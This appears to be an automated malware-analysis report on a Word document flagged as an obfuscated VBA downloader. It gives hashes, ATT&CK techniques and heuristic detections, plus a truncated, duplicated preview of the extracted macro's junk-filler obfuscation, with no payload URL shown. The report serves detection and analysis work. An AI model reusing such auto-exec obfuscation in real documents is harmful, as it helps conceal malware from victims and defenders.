Office (OLE) malware analysis — malicious · fce3cb5ebf184419

MALICIOUS

Office (OLE)

281.5 KB Created: 2019-10-11 06:46:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: b83fe468d19320f6d43d1b41618c4c0c SHA-1: 68e21077c06e932019f62af115ddb525782dcfd9 SHA-256: fce3cb5ebf184419ddfb0eec24a4a0eefa9b581366ac8a6ba9faa8308979e401

282 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing obfuscated VBA macros, indicated by multiple high and critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC'. The presence of an AutoOpen macro and GetObject calls suggests an attempt to automatically execute malicious code upon opening. The ClamAV detection further confirms its malicious nature as a downloader. The VBA code appears to be heavily obfuscated with random-looking variable names and mathematical operations, likely to hinder analysis and disguise its true purpose of downloading and executing a second-stage payload.

Heuristics 8

ClamAV: Doc.Downloader.Generic-7329510-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Generic-7329510-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER

Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 83032 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	83032 bytes
SHA-256: `034a7563a4e4bc0cbe6d2c987c433feef4fa201264df6db6485df67c848d127c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "c0700907660" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Control = "b19x7x45090, 0, 0, MSForms, TextBox" Attribute VB_Control = "b06281x0603, 1, 1, MSForms, TextBox" Attribute VB_Control = "x0c80941695x, 2, 2, MSForms, TextBox" Attribute VB_Control = "x860052b300, 3, 3, MSForms, TextBox" Attribute VB_Control = "cx0102cb058, 4, 4, MSForms, TextBox" Attribute VB_Control = "c3007b6403930, 5, 5, MSForms, TextBox" Attribute VB_Name = "b270861x0570" Function cb123x4531b7() On Error Resume Next 'Future082 Legros Coves, Altatown, New Caledonia Central726 Kertzmann Trail, Lake Weldon, Nauru c40604669229 = Rnd(c0203c2xb705 * ChrB(434)) + Log(233) 'Customer3843 O'Conner Track, Jodyhaven, Pitcairn Islands Regional29224 Parker Via, North Estefania, Norway b29b03045070 = Rnd(c3438728x510 * ChrB(404)) + Log(453) 'Investor14301 Upton Parks, Ovashire, Nauru Corporate3810 Gerardo Fall, New Keven, Christmas Island x36270c561996 = Rnd(x140019c8012 * ChrB(218)) + Log(862) 'Central858 Chris Track, Connellyberg, Macao Chief6017 Jackie View, Whiteview, French Southern Territories x0110bc4234 = Rnd(c170b0191004 * ChrB(321)) + Log(585) 'Legacy3963 Walker Pine, Leanneland, Seychelles Investor3367 Carson Rapids, Quigleyside, Brunei Darussalam x05484c23666 = Rnd(c0b45000b0c * ChrB(181)) + Log(626) 'Product062 Michelle Park, East Lilyan, Congo Lead84818 Stehr Stream, Sauerside, Kiribati bxb103506000 = Rnd(b0x36900296 * ChrB(713)) + Log(6) 'Product6945 Mazie Expressway, Lockmanmouth, United States Minor Outlying Islands Direct440 Kuhlman Isle, Port Akeemfurt, Republic of Korea c206230721291 = Rnd(xbc8774xx687 * ChrB(578)) + Log(902) 'Customer34809 O'Keefe Path, West Sethchester, Cape Verde Principal02250 Rau Burg, Romagueramouth, Greece 'International98166 Evalyn Flats, Lake Lilla, Kyrgyz Republic Lead817 Brakus Place, Andreannetown, Nicaragua c390508028407 = Rnd(c82075c602222 * ChrB(646)) + Log(356) 'Direct2424 Gutkowski Radial, Port Agnes, Honduras Principal85418 Emard Plaza, Lake Paula, Guinea-Bissau b040607090860 = Rnd(cxc32038027 * ChrB(694)) + Log(426) 'District51991 Eloy Spring, Port Patience, British Indian Ocean Territory (Chagos Archipelago) Regional67848 Thaddeus Forks, Carrollborough, Syrian Arab Republic c164x3x86990c = Rnd(x004b972b05b * ChrB(192)) + Log(567) 'Internal0776 Pink Oval, Lake Brenden, Saudi Arabia Senior835 Gusikowski Shoals, Breitenbergchester, Burkina Faso b70b0b64265 = Rnd(x256bb980319 * ChrB(125)) + Log(430) 'District0129 Haley Spur, Zboncakmouth, Ethiopia Future9710 Lang Orchard, Strackestad, Antarctica (the territory South of 60 deg S) c457196xb09 = Rnd(x78407c40833x * ChrB(376)) + Log(388) 'Global6924 Anissa Lakes, Wizaton, Pakistan Human599 Renner Manor, New Cierra, Cayman Islands b2930x600019 = Rnd(x90038x202b * ChrB(630)) + Log(220) 'Dynamic0673 Karson Divide, Walterland, Namibia Future39801 Lesch Meadows, North Howellmouth, Malaysia c0c11cb50x479 = Rnd(c580c2006790 * ChrB(707)) + Log(398) 'Dynamic714 Zoey Light, Altenwerthton, Bhutan Chief878 Stracke Inlet, New Russmouth, Palau 'District2140 Leonel Circle, Morarfort, Iceland Lead992 Darrick Station, Duaneton, Pitcairn Islands c860x07064b = Rnd(c00000461673 * ChrB(907)) + Log(54) 'Forward7390 Green Forges, Jacobsshire, Taiwan Forward477 Friesen Mountains, East Lilliana, United Arab Emirates b800b030590c0 = Rnd(c90x30c06bc * ChrB(286)) + Log(65) 'International347 Roberts Mount, Port Jessborough, Austria Senior91358 Bode Ford, South Ebonytown, Palau bb048103660b = Rnd(bb080011003b0 * ChrB(25)) + Log(543) 'Lead010 Alexander Turnpike, Nienowview, Azerbaijan Global66413 Kub Island, Manteton, Guyana b005923065050 = Rnd(c0xb9074c34 * ChrB(610)) + Log(657) 'Principal097 Gustave Causeway, North Caspershire, Timor-Leste Human6610 Bradtke Stravenue, Hellertown, Montse ... (truncated)

SHA-256: 034a7563a4e4bc0cbe6d2c987c433feef4fa201264df6db6485df67c848d127c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "c0700907660"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Control = "b19x7x45090, 0, 0, MSForms, TextBox"
Attribute VB_Control = "b06281x0603, 1, 1, MSForms, TextBox"
Attribute VB_Control = "x0c80941695x, 2, 2, MSForms, TextBox"
Attribute VB_Control = "x860052b300, 3, 3, MSForms, TextBox"
Attribute VB_Control = "cx0102cb058, 4, 4, MSForms, TextBox"
Attribute VB_Control = "c3007b6403930, 5, 5, MSForms, TextBox"

Attribute VB_Name = "b270861x0570"
Function cb123x4531b7()
On Error Resume Next
   'Future082 Legros Coves, Altatown, New Caledonia Central726 Kertzmann Trail, Lake Weldon, Nauru
c40604669229 = Rnd(c0203c2xb705 * ChrB(434)) + Log(233)
'Customer3843 O'Conner Track, Jodyhaven, Pitcairn Islands Regional29224 Parker Via, North Estefania, Norway
b29b03045070 = Rnd(c3438728x510 * ChrB(404)) + Log(453)
'Investor14301 Upton Parks, Ovashire, Nauru Corporate3810 Gerardo Fall, New Keven, Christmas Island
x36270c561996 = Rnd(x140019c8012 * ChrB(218)) + Log(862)
'Central858 Chris Track, Connellyberg, Macao Chief6017 Jackie View, Whiteview, French Southern Territories
x0110bc4234 = Rnd(c170b0191004 * ChrB(321)) + Log(585)
'Legacy3963 Walker Pine, Leanneland, Seychelles Investor3367 Carson Rapids, Quigleyside, Brunei Darussalam
x05484c23666 = Rnd(c0b45000b0c * ChrB(181)) + Log(626)
'Product062 Michelle Park, East Lilyan, Congo Lead84818 Stehr Stream, Sauerside, Kiribati
bxb103506000 = Rnd(b0x36900296 * ChrB(713)) + Log(6)
'Product6945 Mazie Expressway, Lockmanmouth, United States Minor Outlying Islands Direct440 Kuhlman Isle, Port Akeemfurt, Republic of Korea
c206230721291 = Rnd(xbc8774xx687 * ChrB(578)) + Log(902)
'Customer34809 O'Keefe Path, West Sethchester, Cape Verde Principal02250 Rau Burg, Romagueramouth, Greece
'International98166 Evalyn Flats, Lake Lilla, Kyrgyz Republic Lead817 Brakus Place, Andreannetown, Nicaragua
c390508028407 = Rnd(c82075c602222 * ChrB(646)) + Log(356)
'Direct2424 Gutkowski Radial, Port Agnes, Honduras Principal85418 Emard Plaza, Lake Paula, Guinea-Bissau
b040607090860 = Rnd(cxc32038027 * ChrB(694)) + Log(426)
'District51991 Eloy Spring, Port Patience, British Indian Ocean Territory (Chagos Archipelago) Regional67848 Thaddeus Forks, Carrollborough, Syrian Arab Republic
c164x3x86990c = Rnd(x004b972b05b * ChrB(192)) + Log(567)
'Internal0776 Pink Oval, Lake Brenden, Saudi Arabia Senior835 Gusikowski Shoals, Breitenbergchester, Burkina Faso
b70b0b64265 = Rnd(x256bb980319 * ChrB(125)) + Log(430)
'District0129 Haley Spur, Zboncakmouth, Ethiopia Future9710 Lang Orchard, Strackestad, Antarctica (the territory South of 60 deg S)
c457196xb09 = Rnd(x78407c40833x * ChrB(376)) + Log(388)
'Global6924 Anissa Lakes, Wizaton, Pakistan Human599 Renner Manor, New Cierra, Cayman Islands
b2930x600019 = Rnd(x90038x202b * ChrB(630)) + Log(220)
'Dynamic0673 Karson Divide, Walterland, Namibia Future39801 Lesch Meadows, North Howellmouth, Malaysia
c0c11cb50x479 = Rnd(c580c2006790 * ChrB(707)) + Log(398)
'Dynamic714 Zoey Light, Altenwerthton, Bhutan Chief878 Stracke Inlet, New Russmouth, Palau
   'District2140 Leonel Circle, Morarfort, Iceland Lead992 Darrick Station, Duaneton, Pitcairn Islands
c860x07064b = Rnd(c00000461673 * ChrB(907)) + Log(54)
'Forward7390 Green Forges, Jacobsshire, Taiwan Forward477 Friesen Mountains, East Lilliana, United Arab Emirates
b800b030590c0 = Rnd(c90x30c06bc * ChrB(286)) + Log(65)
'International347 Roberts Mount, Port Jessborough, Austria Senior91358 Bode Ford, South Ebonytown, Palau
bb048103660b = Rnd(bb080011003b0 * ChrB(25)) + Log(543)
'Lead010 Alexander Turnpike, Nienowview, Azerbaijan Global66413 Kub Island, Manteton, Guyana
b005923065050 = Rnd(c0xb9074c34 * ChrB(610)) + Log(657)
'Principal097 Gustave Causeway, North Caspershire, Timor-Leste Human6610 Bradtke Stravenue, Hellertown, Montse
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.